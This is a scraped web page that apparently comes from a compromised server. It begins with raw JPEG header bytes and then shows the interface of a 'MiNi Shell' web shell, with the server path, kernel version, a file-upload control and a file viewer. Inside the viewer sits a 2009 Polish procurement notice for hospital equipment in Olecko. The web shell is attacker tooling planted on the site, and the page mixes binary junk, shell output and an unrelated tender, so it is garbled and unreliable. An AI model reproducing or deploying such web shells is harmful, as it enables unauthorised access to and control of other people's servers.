JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090218/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090218/31800-N-2009.html

<p class="kh_header"><b>Olecko: Zakup fabrycznie  nowego  sprzętu medycznego  na  potrzeby  szpitala w  Olecku</b><br>
<b>Numer ogłoszenia: 31800 - 2009; data zamieszczenia: 18.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe , ul. Kolejowa 32, 19-400 Olecko, woj. warmińsko-mazurskie, tel. 087 5202147, 5202475.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.powiat.olecko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup fabrycznie  nowego  sprzętu medycznego  na  potrzeby  szpitala w  Olecku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup fabrycznie nowego sprzętu medycznego na potrzeby szpitala w  Olecku.:
       Pakiet 1 - poz 1- aparat USG z obrazowaniem 4D szt. 1;
                         poz 2 - aparat RTG przyłóżkowy z monitorem szt.1 .
       Pakiet 2 - 	poz.1 - stół operacyjny szt. 1;
		poz.2 - łóżko pooperacyjne szt. 2; 
		poz 3 - nóż harmoniczny szt. 1; 
		poz 4 - diatermia ogólnochirurgiczna szt. 1;
		poz 5 - pompy infuzyjne 2-strzykawkowe szt. 2;
		poz 6 - monitor pacjenta szt. 6;  
		poz 7 - respirator przenośny szt. 1;
		poz 8 - zestaw laryngoskopowy szt. 1; 
		poz 9 - zestaw do prób wysiłkowych EKG szt. 1;
		poz 10 - artroskop szt. 1;
		poz 11 - wózek do transportu pacjenta z sali operacyjnej szt. 2; 
		poz 12 - aparat do ogrzewania płynów i do płukania szt. 1;
		poz 13 - powietrzny system ogrzewania pacjenta szt. 1; 
		poz 14 - stolik narzędziowy na instrumenty szt. 2 ;
		poz 15 - zestaw laparoskopowy sz. 1;
		poz 16 - respirator szpitalny (do wentylacji mechanicznej) szt. 3;
		poz 17 - kardiomonitor EKG szt. 1;
		poz 18 - defibrylator przenośny szt.1; 
		poz 19 - ssak próżniowy szt. 1; 
		poz 20 - analizator hematologiczny szt. 1;  
		poz 21 - analizator biochemiczny szt. 1; 
		poz 22 - aparat do monitorowania posiewów krwi i płynów ustrojowych szt. 1;.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.03.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Pakiet I - 7000 PLN
Pakiet II - 26000 PLN<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia  mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust 1 ustawy Prawo zamówień publicznych tzn:
3.1.Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają   
      obowiązek posiadania takich uprawnień;
3.2.Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi   
     do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału  
     technicznego i osób zdolnych do wykonania zamówienia.
3.3.Znajdują się w sytuacji ekonomicznej i finansowej  zapewniającej wykonanie zamówienia;   
3.5.Nie podlegają wykluczeniu  z  postępowania o udzielenie zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 4.1. Oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne zgodnie z  
             art.22.ust.1 i art. 24 ust. 1 i 2 Prawa zamówień publicznych - załącznik nr 2;
      4.2 Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy,  
            wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania  ofert;  
4.3.Wykaz wykonanej przynajmniej jednej dostawy sprzętu medycznego w okresie ostatnich trzech lat przed  
           wszczęciem niniejszego postępowania o zamówienie publiczne, a jeżeli okres prowadzenia działalności jest   
           krótszy - w tym okresie, odpowiadającej swoim rodzajem i wartością stanowiącą kwotę składanej oferty, z  
           podaniem jej wartości, przedmiotu, dat wykonania i odbiorców oraz załączenie dokumentów potwierdzających, że  
           dostawy te zostały wykonane należycie.;
      4.4.Informację banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których Wykonawca posiada  
            rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, 
           wystawioną nie wcześniej niż 3  miesiące przed upływem terminu składania  ofert . 
      4.5.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej,  
            zamiast dokumentów, o których mowa wyżej, składa dokumenty, wystawione w kraju, w którym ma  
            siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
   a) nie otwarto jego likwidacji ani nie ogłoszono upadłości (wystawione nie wcześniej niż 6 miesięcy przed  
        upływem terminu składania ofert - lub potwierdzona za  zgodność z oryginałem kopia), 
    b) nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo że  
        uzyskał  przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub   
        wstrzymanie w całości  wykonania decyzji właściwego organu (wystawione nie wcześniej niż 3 miesiące  
        przed upływem terminu składania ofert - lub potwierdzona za  zgodność z oryginałem kopia), 
    c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie (wystawione nie wcześniej niż 6 miesięcy  
        przed upływem terminu składania ofert - lub potwierdzona za  zgodność z oryginałem kopia), 
    d) składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo
        zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, 
        (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - lub potwierdzona za  
        zgodność z oryginałem kopia), 
    e) Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce   
        zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 3;  zastępuje się  je  dokumentem  
        zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym  
        albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub  
        kraju, w którym Wykonawca ma siedzibę  lub miejsce  zamieszkania. 
4.6.W celu  potwierdzenia, że oferowany przedmiot  zamówienia  odpowiada wymaganiom  określonym przez   
       Zamawiającego, Wykonawca winien załączyć do oferty:
    a) dokumenty dopuszczające do obrotu i używania wyrobu medycznego zgodnie z ustawą z dnia 20.04.2004r  
        o wyrobach medycznych (Dz. U. z dn. 30 kwietnia 2004 r., Nr 93, poz. 896 ze zm.),
    b) prospekty producentów aparatury potwierdzające spełnienie wszystkich parametrów technicznych  
        uwzględnionych w przedmiotowej SIWZ ( załącznik nr 5 )
    c) dokumenty sporządzone w języku obcym winne być złożone wraz z tłumaczeniem na język polski,  
        poświadczone przez Wykonawcę za zgodność z oryginałem.  
    d) jeżeli w prospekcie technicznym brak opisu danej funkcji aparatu lub wartości parametru, dopuszcza się  
          załączenie do oferty innych dokumentów producenta (np. część instrukcji obsługi), w których  
          Zamawiający będzie w stanie zweryfikować zgodność opisu funkcji lub wartości danego parametru.
4.7.Pozostałe  wymagane  dokumenty:
	    a) Aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności  
        gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności  
        gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (lub  
        potwierdzona za zgodność z oryginałem kopia); 
    b)Aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu
        Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio,  
        że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i  
        społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty  
        zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie  
        wcześniej niż 3 miesiące przed upływem terminu  składania ofert;
	    c) Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy,
        wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania  ofert;
     d)Wypełniony i podpisany  załącznik cenowy - załącznik nr 4 ;
     e) Wypełniony i podpisany  arkusz parametrów technicznych i użytkowych - załącznik nr 5 ;
     f) Dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynikają z przepisów prawa lub  
           innych dokumentów rejestrowych (oryginał lub czytelna kserokopia potwierdzona za zgodność z   oryginałem   
           przez Wykonawcę );
      g) Dowód  wniesienia  wadium (wg zasad określonych  w rozdziale 8 SIWZ); 
      h) W przypadku, gdy ofertę składają Wykonawcy ubiegający się wspólnie o udzielenie zamówienia   
         wymagane jest załączenie dokumentu  pełnomocnictwa   określającego zakres umocowania pełnomocnika  
         ustanowionego do reprezentowania ich w postępowaniu lub do reprezentowania ich w postępowaniu i   
         zawarcia umowy w sprawie przedmiotowego zamówienia publicznego, w  myśl art. 23 ustawy.  
         Podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte  
        wykonanie zobowiązań.
4.8. Jeżeli Wykonawca powierzy wykonanie zamówienia podwykonawcy winien w ofercie określić, jaka część  
         zamówienia będzie realizowana przez podwykonawcę. 
4.9. Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez  
        Zamawiającego oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 ustawy Prawo zamówień  
        publicznych, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego  
        oświadczenia i dokumenty, o których mowa w art. 25 ust.1 ustawy Prawo zamówień publicznych  
        zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie,  
        chyba że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie  
        postępowania.
4.10. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie  
         przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie wymagań określonym przez  
         Zamawiającego,  nie później niż w dniu, w którym upłynął termin składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.olecko.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Olecku, ul. Kolejowa 32, 19-400 Olecko.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.04.2009 godzina 12:00, miejsce: Starostwo Powiatowe w Olecku, ul. Kolejowa 32, 19-400 Olecko, Kancelaria p. 22.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> NINIEJSZY  PRZETARG  REALIZOWANY  JEST ZE  ŚRODKÓW  EUROPEJSKIEGO  FUNDUSZU  ROZWOJU  REGIONALNEGO   W  RAMACH   REGIONALNEGO  
PROGRAMU  OPERACYJNEGO   WARMIA  I  MAZURY  2007 - 2013
PRIORYTET  3   -  Infrastruktura  społeczna.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet 1.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 1 - poz 1- aparat USG z obrazowaniem 4D szt. 1;
              poz 2 - aparat RTG przyłóżkowy z monitorem szt. 1 ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet 2.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 2 - 	poz.1 - stół operacyjny szt. 1;
		poz.2 - łóżko pooperacyjne szt. 2; 
		poz 3 - nóż harmoniczny szt.1; 
		poz 4 - diatermia ogólnochirurgiczna szt. 1;
		poz 5 - pompy infuzyjne 2-strzykawkowe szt. 2;
		poz 6 - monitor pacjenta szt. 6;  
		poz 7 - respirator przenośny szt. 1;
		poz 8 - zestaw laryngoskopowy szt. 1; 
		poz 9 - zestaw do prób wysiłkowych EKG szt. 1;
		poz 10 - artroskop szt.1;
		poz 11 - wózek do transportu pacjenta z sali operacyjnej szt.2; 
		poz 12 - aparat do ogrzewania płynów i do płukania szt. 1;
		poz 13 - powietrzny system ogrzewania pacjenta szt. 1; 
		poz 14 - stolik narzędziowy na instrumenty szt. 2 ;
		poz 15 - zestaw laparoskopowy szt. 1;
		poz 16 - respirator szpitalny (do wentylacji mechanicznej) szt.3;
		poz 17 - kardiomonitor EKG szt. 1;
		poz 18 - defibrylator przenośny szt. 1; 
		poz 19 - ssak próżniowy szt. 1; 
		poz 20 - analizator hematologiczny szt. 1;  
		poz 21 - analizator biochemiczny szt. 1; 
		poz 22 - aparat do monitorowania posiewów krwi i płynów ustrojowych szt. 1;.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.03.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com